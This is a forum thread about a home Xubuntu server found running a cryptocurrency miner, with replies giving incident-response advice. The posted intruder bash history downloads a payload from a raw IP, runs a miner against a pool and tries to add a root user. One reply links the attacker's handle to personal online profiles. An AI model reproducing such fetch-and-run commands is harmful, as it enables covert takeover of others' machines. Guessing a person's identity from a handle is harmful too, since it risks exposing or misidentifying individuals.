Xubuntu 12.04/64, OpenSSH Server Hacked

[mbogevik]

Last night I discovered a task on my Xubuntu 12.04/64 server (yes, conky is nice to have) as a process "m64.pl" used about 85-100% CPU time. After checking with everyone in my family I see the only option, I have got hacked, possibly through a Windows 7 computer since port 22 is closed in DSL router.

Here is bash history left by hacker :

free -m
cat /proc/cpuinfo
uname -a
ls -l
cd Public
wget 79.114.47.143/m64.zip
unzip m64.zip
chmod +x *
./m64.pl -o stratum+tcp://linuxpower.cf:3333 -u sebywarlord.1 -p miningltcs -B
ps -x
pgrep minerd
w
ifconfig
sude
sudo
sudo useradd ruut
useradd ruut
su root useradd
exit

To me it seems that someone has started a bitcoin task

What I have done is killing the process, remove files in /Public (had to do it in root as they where locked) and uninstall "OpenSSH Server".

Any suggestions on how to handle this would be most appreciated

Morten (Smiling after all)

[mbogevik]

It may be that the login is not a SSH login since both of my users says "Last login: Fri Jan 17 12:06:37 2014" while entering command "lastlog". Also I have Hamachi online on the computer. Still investigating...

[brokenhachi]

lol... don't open your ssh server with PW auth to the wild world of the internet? You can see the ssh login attempts at /var/log/auth.log

i'd wipe and reinstall the system if i were you..

[lisati]

Thread moved to Security Discussions.

[ubudog]

lol... don't open your ssh server with PW auth to the wild world of the internet? You can see the ssh login attempts at /var/log/auth.log

i'd wipe and reinstall the system if i were you..

+1 on wiping and reinstalling.

Also, in the future be sure to disable password authentication in /etc/ssh/sshd_config.

This is a great tutorial on how to setup key-based authentication with your ssh server.

[CharlesA]

free -m
cat /proc/cpuinfo
uname -a
ls -l
cd Public
wget 79.114.47.143/m64.zip
unzip m64.zip
chmod +x *
./m64.pl -o stratum+tcp://linuxpower.cf:3333 -u sebywarlord.1 -p miningltcs -B
ps -x
pgrep minerd
w
ifconfig
sude
sudo
sudo useradd ruut
useradd ruut
su root useradd
exit

If this was a hacker, they should have known what system they were accessing via uname -a, so they wouldn't have tried to run su root, because the root user is locked in a default install of Ubuntu.

Do you have any other services running on this box? Just because ssh is not open to the internet does not mean another server isn't open to the internet.

[bashiergui]

If this was a hacker, they should have known what system they were accessing via uname -a, so they wouldn't have tried to run su root, because the root user is locked in a default install of Ubuntu.

Perhaps he's still in training camp?

+1 to the recommendation to reinstall, then make sure you properly secure any internet-facing services. I would also be highly suspicious of all the other computers on this network. I would reimage them all.

There's some fun facts to pull out of your bash history. The IP comes back to Romania. The name "sebywarlord" includes some interesting online profiles:

1. Seems to be a Romanian fellow just looking for love http://www.lets101.com/sebywarlord/profile

2. He might be a gamer, there are a bunch of gamer forum profiles.

3. Stack Exchange account with that name posted a pic of himself
http://stackoverflow.com/users/3076388/sebywarlord

4. Sebywarlord is a member of 2 illegal-looking forums where he posted the outcome of what looks like a brute forcing script.

[CharlesA]

Perhaps he's still in training camp?

+1 to the recommendation to reinstall, then make sure you properly secure any internet-facing services. I would also be highly suspicious of all the other computers on this network. I would reimage them all.

+1 to that. I would check /var/log/auth.log for any unusual entries and also check to see which processes are listening on that box before wiping it (take it off the network at least).

Code:

sudo netstat -nlp

[mbogevik]

Yes, large number of login attempts in /var/log/auth.log...

But the thing is I do not have port 22 open on router (DSL), only Teamspeak 3 server and my kids Minecraft server is open to the world.

I think that I first need to find how this person got access, wipe and reinstall may not help if it is through a Windows 7 computer or any other "box" on my LAN, like Xbox 360, Raspberry Pi, VU++ satellite tuner, Popcorn media player or even the Synology DS213j NAS. But in the end I think the six computers with Windows 7 is the largest gift to a hacker.

I check the netstat command when back from work

[bashiergui]

This guy (the hacker) isn't the sharpest knife in the drawer. Check logs on your minecraft & teamspeak servers for connections to the same IP.

It doesn't really matter how he got in. You could spend a ton of money and time trying to find out. I recommend you focus on inspecting each box the best you can for any evidence of intrusion. Then reimage the ones that are affected. Then figure out how to secure the network.

This of course assumes you have backups... If you don't then unplug the network from the Internet and go buy yourself an external drive to copy all your data to it.